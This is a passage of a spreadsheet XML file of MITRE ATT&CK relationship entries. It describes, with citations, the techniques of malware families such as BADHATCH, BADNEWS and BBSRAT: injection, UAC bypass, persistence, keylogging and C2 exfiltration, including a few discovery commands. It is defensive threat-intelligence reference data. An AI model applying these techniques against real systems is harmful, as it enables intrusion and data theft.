    <t>relationship--16cb7ede-b431-4711-bcb1-91bc925663e5</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) uses HTTP as a transport to communicate with its command server.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--5697b245-d888-40ab-af72-9236c6daa273</t>
  </si>
  <si>
    <t>Adversaries can direct [BACKSPACE](https://attack.mitre.org/software/S0031) to execute from the command line on infected hosts, or have [BACKSPACE](https://attack.mitre.org/software/S0031) create a reverse shell.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--3f14994e-149d-4cca-85b8-eec0964120d3</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) disables the Windows firewall before binding to a port.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>relationship--279654f5-dece-48db-bc9a-93242b62433c</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) modifies the firewall Registry key &lt;code&gt;SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileGloballyOpenPorts\\List&lt;/code&gt;.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>relationship--7e559e10-483a-42ca-8ddf-d8ca04ed8bd2</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) communicates on ports 443 and 8000 with a FakeTLS method.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>relationship--c13bc6b0-a8fa-4c52-9774-3738a5f1ce90</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) uses a FakeTLS method during C2.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>relationship--5292f0c1-e65e-4233-aa97-ab75354d74a9</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) functions as a proxy server between the victim and C2 server.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>relationship--5f6e76c5-732c-4bc8-9c17-ac1e58a5d88e</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) encrypts C2 traffic using an XOR/ADD cipher.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>relationship--3a11eb81-545a-4153-8c3b-feb47db1f288</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) collects the computer name and host name on the compromised system.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>relationship--8840d33c-de12-45d5-a0e3-cdfddf789794</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) collects the network adapter information.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>relationship--f966726b-ff17-4769-8514-e76be900aafa</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has compressed data using the aPLib compression library.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--7b05bdd0-2241-4b2d-a5a0-0531edca6311</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has uploaded files from victims' machines.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--aacc2945-4ff1-4bf8-8428-1198eb6e127e</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) can decode shellcode using a custom rotating XOR cipher.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--d1a489c9-f937-4cc8-85d0-b4ce6b961a62</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has searched for files on the infected host.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--8170e34e-8342-4cbf-ae24-7bce63fb4d48</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has download files from its C2 server.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--c07e24ea-bf70-4f9c-a45e-73dfc0ede007</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--9bce879f-ffe8-425b-81d6-10408902c397</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has been distributed via spearphishing campaigns containing malicious Microsoft Word documents.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--af48f343-0359-444b-b6b4-1cddd36ddfd7</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has captured victim computer name, memory space, and CPU details.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--634d3199-9979-4df1-8fbe-5fc355726602</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has captured victim IP address details.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--bd531d92-8077-4b8e-9209-212b0c4d1b87</t>
  </si>
  <si>
    <t>[BADFLICK](https://attack.mitre.org/software/S0642) has delayed communication to the actor-controlled IP address by 5 minutes.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>relationship--b7f2b493-8c91-4793-8206-52d302906b2b</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can beacon to a hardcoded C2 IP address using TLS encryption every 5 minutes.(Citation: Gigamon BADHATCH Jul 2019)</t>
  </si>
  <si>
    <t>relationship--922d5db0-2588-46d9-9a91-e5d4ccc3c84c</t>
  </si>
  <si>
    <t xml:space="preserve">[BADHATCH](https://attack.mitre.org/software/S1081) can inject itself into a new `svchost.exe -k netsvcs` process using the asynchronous procedure call (APC) queue.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021) </t>
  </si>
  <si>
    <t>relationship--dcdf4518-1248-4549-b536-193ab1848d31</t>
  </si>
  <si>
    <t xml:space="preserve">[BADHATCH](https://attack.mitre.org/software/S1081) can utilize the CMSTPLUA COM interface and the SilentCleanup task to bypass UAC.(Citation: BitDefender BADHATCH Mar 2021) </t>
  </si>
  <si>
    <t>relationship--d9e56665-26bb-49e2-99b4-6b4e7ccb38e3</t>
  </si>
  <si>
    <t xml:space="preserve">[BADHATCH](https://attack.mitre.org/software/S1081) malicious PowerShell commands can be encoded with base64.(Citation: BitDefender BADHATCH Mar 2021) </t>
  </si>
  <si>
    <t>relationship--422ae7c9-d403-4d3e-89d4-593e03f3b4a3</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can use `net.exe group "domain admins" /domain` to identify Domain Administrators.(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--b2bd8d90-28ca-4524-85f7-07aaf066b485</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can use `nltest.exe /domain_trusts` to discover domain trust relationships on a compromised machine.(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--b7b996f4-eb93-457d-a0e7-999e2dd39182</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) has the ability to execute a malicious DLL by injecting into `explorer.exe` on a compromised machine.(Citation: Gigamon BADHATCH Jul 2019)</t>
  </si>
  <si>
    <t>relationship--6e906ef1-2984-4d8e-ba9f-5f40f30f996e</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) has an embedded second stage DLL payload within the first stage of the malware.(Citation: Gigamon BADHATCH Jul 2019)</t>
  </si>
  <si>
    <t>relationship--36929435-86c4-41f9-8922-ad5e1fc512b1</t>
  </si>
  <si>
    <t xml:space="preserve">[BADHATCH](https://attack.mitre.org/software/S1081) can exfiltrate data over the C2 channel.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021) </t>
  </si>
  <si>
    <t>relationship--f4dc0552-707f-453b-96c9-5e757a408e53</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) has the ability to delete PowerShell scripts from a compromised machine.(Citation: Gigamon BADHATCH Jul 2019)</t>
  </si>
  <si>
    <t>relationship--9f5593f4-2cd8-4e98-81ff-8afb615d88ef</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can emulate an FTP server to connect to actor-controlled C2 servers.(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--d31bacda-9a8f-4807-b0d6-51a47f0af986</t>
  </si>
  <si>
    <t xml:space="preserve">[BADHATCH](https://attack.mitre.org/software/S1081) has the ability to load a second stage malicious DLL file onto a compromised machine.(Citation: Gigamon BADHATCH Jul 2019) </t>
  </si>
  <si>
    <t>relationship--785e8778-84d2-46a5-b96a-ea71b1adc650</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can utilize Native API functions such as, `ToolHelp32` and `Rt1AdjustPrivilege` to enable `SeDebugPrivilege` on a compromised machine.(Citation: Gigamon BADHATCH Jul 2019)</t>
  </si>
  <si>
    <t>relationship--6d49721f-17a2-4f02-a760-f0bfe9c0b759</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can check for open ports on a computer by establishing a TCP connection.(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--6eaf57d7-1e0c-437a-b5e6-4b4dc6f00ae1</t>
  </si>
  <si>
    <t xml:space="preserve">[BADHATCH](https://attack.mitre.org/software/S1081) can check a user's access to the C$ share on a compromised machine.(Citation: BitDefender BADHATCH Mar 2021) </t>
  </si>
  <si>
    <t>relationship--003eed51-a560-44f1-9149-5a11bdaebe6f</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can be compressed with the ApLib algorithm.(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--940e8f94-a0bf-43e9-b2e8-53dd9a3f0e6e</t>
  </si>
  <si>
    <t xml:space="preserve">[BADHATCH](https://attack.mitre.org/software/S1081) can perform pass the hash on compromised machines with x64 versions.(Citation: BitDefender BADHATCH Mar 2021) </t>
  </si>
  <si>
    <t>relationship--b33a7611-2426-434d-873a-6d74a8f91974</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can utilize `powershell.exe` to execute commands on a compromised host.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--07ef8045-6a01-4764-a351-a8a2ee2170f7</t>
  </si>
  <si>
    <t xml:space="preserve">[BADHATCH](https://attack.mitre.org/software/S1081) can retrieve a list of running processes from a compromised machine.(Citation: BitDefender BADHATCH Mar 2021) </t>
  </si>
  <si>
    <t>relationship--2863b77b-a029-4c9e-a573-e5e16d979391</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can inject itself into an existing explorer.exe process by using `RtlCreateUserThread`.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--17ec5db7-d1cd-4057-9d95-a6da56b06825</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</si>
  <si>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</si>
  <si>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relationship--62d56cae-9131-4088-ad0a-810a731d2a9f</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can copy a large byte array of 64-bit shellcode into process memory and execute it with a call to `CreateThread`.(Citation: Gigamon BADHATCH Jul 2019)</t>
  </si>
  <si>
    <t>relationship--04a55a4d-7888-4e52-8d6f-6befbc82f6f2</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can use a PowerShell object such as, `System.Net.NetworkInformation.Ping` to ping a computer.(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--18c44352-1eca-4d6e-9eac-9793b75223df</t>
  </si>
  <si>
    <t xml:space="preserve">[BADHATCH](https://attack.mitre.org/software/S1081) can use `schtasks.exe` to gain persistence.(Citation: BitDefender BADHATCH Mar 2021) </t>
  </si>
  <si>
    <t>relationship--3d829924-77dc-42cf-897c-a7def75b6be6</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can take screenshots and send them to an actor-controlled C2 server.(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--33fb5b08-700d-4c29-a971-c7493b904d1a</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</si>
  <si>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</si>
  <si>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relationship--2c88062e-f63f-4313-85ef-3d68a9d3fde5</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can execute `netstat.exe -f` on a compromised machine.(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--eb08d5b1-786c-43c8-9984-5b7b92d90d91</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can obtain logged user information from a compromised machine and can execute the command `whoami.exe`.(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--5ea72071-0251-4826-8a7b-7677ec52eadb</t>
  </si>
  <si>
    <t xml:space="preserve">[BADHATCH](https://attack.mitre.org/software/S1081) can obtain the `DATETIME` from a compromised machine.(Citation: BitDefender BADHATCH Mar 2021)  </t>
  </si>
  <si>
    <t>relationship--39f8de6f-9df3-4e6b-9076-bd3464a2d5d2</t>
  </si>
  <si>
    <t xml:space="preserve">[BADHATCH](https://attack.mitre.org/software/S1081) can impersonate a `lsass.exe` or `vmtoolsd.exe` token.(Citation: BitDefender BADHATCH Mar 2021) </t>
  </si>
  <si>
    <t>relationship--dd28aa9c-762c-4726-b402-6536bae9490c</t>
  </si>
  <si>
    <t xml:space="preserve">[BADHATCH](https://attack.mitre.org/software/S1081) can use HTTP and HTTPS over port 443 to communicate with actor-controlled C2 servers.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021) </t>
  </si>
  <si>
    <t>relationship--52625b6a-41f0-4e87-ba03-5c037425c245</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can be utilized to abuse `sslip.io`, a free IP to domain mapping service, as part of actor-controlled C2 channels.(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--9f3ded7a-feef-4180-b89c-baca3c08f96c</t>
  </si>
  <si>
    <t xml:space="preserve">[BADHATCH](https://attack.mitre.org/software/S1081) can use `cmd.exe` to execute commands on a compromised host.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021) </t>
  </si>
  <si>
    <t>relationship--ca47d783-2a71-4ff9-b5aa-df2c1805ea7a</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can utilize WMI to collect system information, create new processes, and run malicious PowerShell scripts on a compromised machine.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--d47ea1ea-ea4c-46e0-b761-9b6c24888be6</t>
  </si>
  <si>
    <t>[BADHATCH](https://attack.mitre.org/software/S1081) can use WMI event subscriptions for persistence.(Citation: BitDefender BADHATCH Mar 2021)</t>
  </si>
  <si>
    <t>relationship--abb5f6e2-1813-4d0e-8269-cceec54b4843</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) monitors USB devices and copies files with certain extensions to a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--5027a119-ff43-4ca6-a862-3efe39b29b3e</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) can use multiple C2 channels, including RSS feeds, Github, forums, and blogs.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--3f37a188-b994-4191-aee1-56d0c60101e1</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) typically loads its DLL file into a legitimate signed Java or VMware executable.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>relationship--283e242a-72d4-4b40-8905-888595c34919</t>
  </si>
  <si>
    <t>After encrypting C2 data, [BADNEWS](https://attack.mitre.org/software/S0128) converts it into a hexadecimal representation and then encodes it into base64.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--3884be12-f73f-4f9b-875e-68d40798faf6</t>
  </si>
  <si>
    <t>When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>relationship--11a7431f-416f-48de-a3c0-8782abdede63</t>
  </si>
  <si>
    <t>When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--6c9649b7-00c6-4503-a911-9e8b9086eac4</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) copies files with certain extensions from USB devices to
a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--93fc3086-d2c0-4b4d-8a69-278f15176739</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) collects C2 information via a dead drop resolver.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--0c870326-6b8a-4279-bbd3-2c1ae23ba54a</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) identifies files with certain extensions from USB devices, then copies them to a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--f761e63a-5c5a-47e3-8256-08bd299f329e</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is capable of downloading additional files through C2 channels, including a new version of itself.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--b3f53743-4bd9-47a6-bf41-6f7786bbdc87</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--469585eb-231d-4ecb-8fc5-fb4f538c3875</t>
  </si>
  <si>
    <t>When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) spawns a new thread to log keystrokes.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--3e09a5ce-a6a0-4f03-8c23-a7ebb4dfd74c</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</si>
  <si>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</si>
  <si>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relationship--db8f1355-57f0-446d-a261-b168497b20c6</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) attempts to hide its payloads using legitimate filenames.(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>relationship--bfa9ae5f-0e45-4a43-9d37-00c9574a1528</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) has a command to download an .exe and execute it via CreateProcess API. It can also run with ShellExecute.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--d15cda3e-7ed6-4914-a0a8-ff1f4fe668ec</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--f9c7d0e1-135f-4e21-8251-3049bc24c18d</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) has a command to download an .exe and use process hollowing to inject it into a new process.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--a5b4d08c-963a-48fe-8f22-ba344835d00e</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) installs a registry Run key to establish persistence.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--8c359d18-06fc-4db1-9b58-6e85fa563066</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) creates a scheduled task to establish by executing a malicious payload every subsequent minute.(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>relationship--521278a2-0924-4ff8-b5a6-03f5f69426b6</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) has a command to take a screenshot and send it to the C2 server.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>relationship--11010986-1b4d-4158-b47d-bbff34306c98</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) encodes C2 traffic with base64.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--79f0712b-2cb1-47df-8ea1-26fb1502a831</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) encrypts C2 data with a ROR by 3 and an XOR by 0x23.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--1ba38510-0489-4305-944f-451e6869b30f</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) establishes a backdoor over HTTP.(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>relationship--0f76d408-be8a-478e-8a5a-aab1d1f96572</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is capable of executing commands via cmd.exe.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--a2a31eb7-0b22-416c-b12d-e52e5f37f8b8</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to decrypt AES encrypted payloads.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--7562ef46-c452-4338-9e06-3afdcf2c0e04</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to download files from C2 to the infected host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--576db5e8-7371-4dea-ada9-599cc231e727</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to use the &lt;code&gt;CreatePipe&lt;/code&gt; API to add a sub-process for execution via [cmd](https://attack.mitre.org/software/S0106).(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--f8f24599-854a-4795-891b-c28d89b8ddcc</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--2dcfc7b7-ead5-4996-b70d-205d4f9d59f5</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) can extract a malicious Portable Executable (PE) from a photo.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--3811b12a-fcfc-47d2-83ec-89df60ca4c21</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--57bf4742-638a-41fe-8c09-e0f690b74190</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to use [cmd](https://attack.mitre.org/software/S0106) to run a Portable Executable (PE) on the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--7b46066e-4e23-4391-833a-651ea1e0982d</t>
  </si>
  <si>
    <t>S0127</t>
  </si>
  <si>
    <t>BBSRAT</t>
  </si>
  <si>
    <t>malware--64d76fa5-cf8f-469c-b78c-1a4f7c5bad80</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can compress data with ZLIB prior to sending it back to the C2 server.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>relationship--35373a50-d85d-4ac5-94bc-5896b48ac5c6</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</si>
  <si>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</si>
  <si>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relationship--8793b289-4b74-4119-8561-a9ad27dacdff</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</si>
  <si>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</si>
  <si>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relationship--6b19a5ae-3f6a-4950-94da-22d94477d5d2</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) uses [Expand](https://attack.mitre.org/software/S0361) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>relationship--128e8365-7645-41fa-832e-5ff4d8639035</t>
  </si>
  <si>
    <t>20 February 2019</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can delete files and directories.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>relationship--93812c9c-39f1-4bf6-adda-601d0ffd88bf</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can list file and directory information.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>relationship--8beb37e3-5cf0-4229-ae27-186a37133521</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can list running processes.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>relationship--b82f51f9-74a0-43e1-b3c6-63df3a90c9eb</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) has been seen loaded into msiexec.exe through process hollowing to hide its execution.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>relationship--ec6074e4-4137-42a4-86c8-1ea95ce54df6</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the Registry Run key location &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssonsvr.exe&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--4af1ec66-5007-49df-8a10-df2c8ed7edc8</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can start, stop, or delete services.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>relationship--59b39f06-a71c-42f7-92f2-244a183113d6</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) uses a custom encryption algorithm on data sent back to the C2 server over HTTP.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>relationship--805f7ba3-a904-410c-b9fd-20356c595b19</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can query service configuration information.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>relationship--54e99ba2-143f-43be-8d7f-79de5551d1ac</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>relationship--7fd6c479-00ae-478d-a29b-fc40619eea97</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can modify service configurations.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>relationship--96077086-d811-47a1-a805-decbf6f249b7</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) uses SSL for encrypting C2 communications.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--e54282cb-8567-4c43-b6ab-3cfd0e52fb9a</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) malware contains a secondary fallback command and control server that is contacted after the primary command and control server.(Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--3ac3a282-e1be-45f8-8974-0a94e5d43644</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to download a file from the C2 server.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--b0220134-2033-4261-9b1d-e94abd691476</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) can capture keystrokes.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--dfe16a67-5f63-40a8-9f60-2d0313e55e46</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to enumerate running processes and identify their owners.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--93fe5493-d3c1-4db2-8228-61da951c660e</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to periodically take screenshots of the system.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--2d920718-61fc-4e10-ad09-df0a00d69cd4</t>
  </si>
  <si>
